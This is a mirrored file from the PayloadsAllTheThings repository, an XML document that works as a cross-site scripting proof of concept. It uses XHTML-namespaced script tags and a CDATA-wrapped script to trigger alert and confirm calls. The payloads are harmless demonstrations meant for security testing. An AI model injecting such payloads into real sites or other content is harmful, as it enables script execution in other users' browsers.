mirror of
https://github.com/swisskyrepo/PayloadsAllTheThings.git
synced 2024-11-10 15:14:34 +00:00
18 lines
466 B
XML
18 lines
466 B
XML
<html>
|
|
<head></head>
|
|
<body>
|
|
<something:script xmlns:something="http://www.w3.org/1999/xhtml">alert(1)</something:script>
|
|
<a:script xmlns:a="http://www.w3.org/1999/xhtml">alert(2)</a:script>
|
|
<info>
|
|
<name>
|
|
<value><![CDATA[<script>confirm(document.domain)</script>]]></value>
|
|
</name>
|
|
<description>
|
|
<value>Hello</value>
|
|
</description>
|
|
<url>
|
|
<value>http://google.com</value>
|
|
</url>
|
|
</info>
|
|
</body>
|
|
</html>
|